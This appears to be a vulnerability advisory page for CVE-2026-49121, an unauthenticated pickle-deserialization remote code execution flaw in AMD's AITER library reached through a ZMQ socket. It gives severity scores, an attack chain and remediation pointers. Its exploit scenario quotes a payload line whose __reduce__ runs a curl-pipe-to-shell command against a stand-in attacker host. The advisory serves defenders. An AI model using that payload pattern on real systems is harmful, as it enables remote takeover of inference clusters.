Skip to main content

AMD AITER CVE-2026-49121

| EUVD-2026-33717 CRITICAL
Deserialization of Untrusted Data (CWE-502)
2026-06-01 VulnCheck GHSA-3qph-h85w-86qp
RCE Deserialization Aiter
9.2
CVSS 4.0 · NVD
Share

Severity by source

NVD PRIMARY
9.2 CRITICAL
CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X

Primary rating from NVD · only source for this CVE.

CVSS VectorNVD

CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X
Attack Vector
Network
Attack Complexity
Low
Privileges Required
None
User Interaction
None
Scope
X

Lifecycle Timeline

4
Source Code Evidence Fetched
Jun 01, 2026 - 19:22 vuln.today
Analysis Generated
Jun 01, 2026 - 19:22 vuln.today
Severity Changed
Jun 01, 2026 - 19:22 NVD
HIGH CRITICAL
CVSS changed
Jun 01, 2026 - 19:22 NVD
8.1 (HIGH) 9.2 (CRITICAL)

DescriptionCVE.org

AI Tensor Engine for ROCm (AITER) through 0.1.14 contains an unauthenticated remote code execution vulnerability in the MessageQueue.recv() function within shm_broadcast.py that allows unauthenticated remote attackers to execute arbitrary code by sending a malicious pickle payload to a ZMQ SUB socket with no authentication, HMAC, or format validation. Attackers who can reach the writer XPUB endpoint on the cluster network or supply a forged Handle with an attacker-controlled remote_subscribe_addr can deliver a crafted pickle payload that executes arbitrary code simultaneously as the inference worker process on every remote reader worker.

AnalysisAI

Remote code execution in AMD's AI Tensor Engine for ROCm (AITER) through version 0.1.14 allows unauthenticated network attackers to run arbitrary code on every inference worker in a distributed cluster by sending a malicious pickle payload to the ZMQ SUB socket consumed by MessageQueue.recv() in shm_broadcast.py. The vulnerability stems from unauthenticated, unvalidated pickle deserialization with no HMAC or format checks; no public exploit identified at time of analysis, but VulnCheck has published an advisory and AMD has merged an upstream fix.

Unlock full vulnerability intelligence

  • Risk assessment & exploitation conditions
  • Attack chain visualization
  • Remediation with exact patch versions
  • Threat intelligence from 22 sources
  • Personal watchlist & email alerts
Continue with Google Continue with GitHub

Free forever · No credit card required

Attack ChainAIDerived

Hypothetical attack flow derived from CVE metadata

Recon
Gain foothold on cluster network
Delivery
Discover AITER XPUB endpoint or inject forged Handle
Exploit
Craft pickle payload with __reduce__ RCE gadget
Install
Publish payload to ZMQ topic
C2
MessageQueue.recv() deserializes on every worker
Execute
Arbitrary code executes across all reader workers
Impact
Pivot to model data, credentials, and adjacent infrastructure
Sign in to reveal

Vulnerability AssessmentAI

Exploitation Attacker must be able to deliver bytes to the ZMQ SUB socket consumed by MessageQueue.recv() in shm_broadcast.py - concretely, either (a) network reachability to the writer worker's XPUB endpoint on the AITER cluster interconnect, or (b) the ability to supply a forged Handle object containing an attacker-controlled remote_subscribe_addr that a victim worker will connect to. … Additional conditions and limiting factors are described in the full assessment.
Risk Assessment Signals partially conflict. … Full risk analysis with EPSS, KEV, and SSVC signal comparison available after sign-in.
Exploit Scenario An attacker who lands on the cluster's internal network - for example via a compromised tenant container on a shared GPU fleet, a foothold in an adjacent service, or a misconfigured cloud security group - connects to the AITER writer's XPUB endpoint and publishes a crafted pickle payload whose __reduce__ returns os.system('curl attacker.tld/x | sh'). Every reader worker subscribed to that topic deserializes the payload inside MessageQueue.recv() and executes the command in the inference process context, giving the attacker simultaneous code execution across the entire worker fleet. …
Remediation Upstream fix available (GitHub PR ROCm/aiter#3170 referenced from issue #3076); a released patched version is not independently confirmed from the provided data - verify against the AITER release notes at https://github.com/ROCm/aiter/releases and pin to the first post-fix tag once published, then rebuild or reinstall any downstream vLLM/SGLang/ATOM/PyTorch-ROCm images that bundle AITER. … Detailed patch versions, workarounds, and compensating controls in full report.
Sign in to read full assessment

Recommended ActionAI

Within 24 hours: Identify all systems running AITER through version 0.1.14 and confirm exposure of ZMQ SUB sockets to untrusted networks. …

Sign in for detailed remediation steps and compensating controls.

Threat intelligence, references, and detailed analysis are available after sign-in.

Share

CVE-2026-49121 vulnerability details – vuln.today
Back

This site uses cookies essential for authentication and security. No tracking or analytics cookies are used. Privacy Policy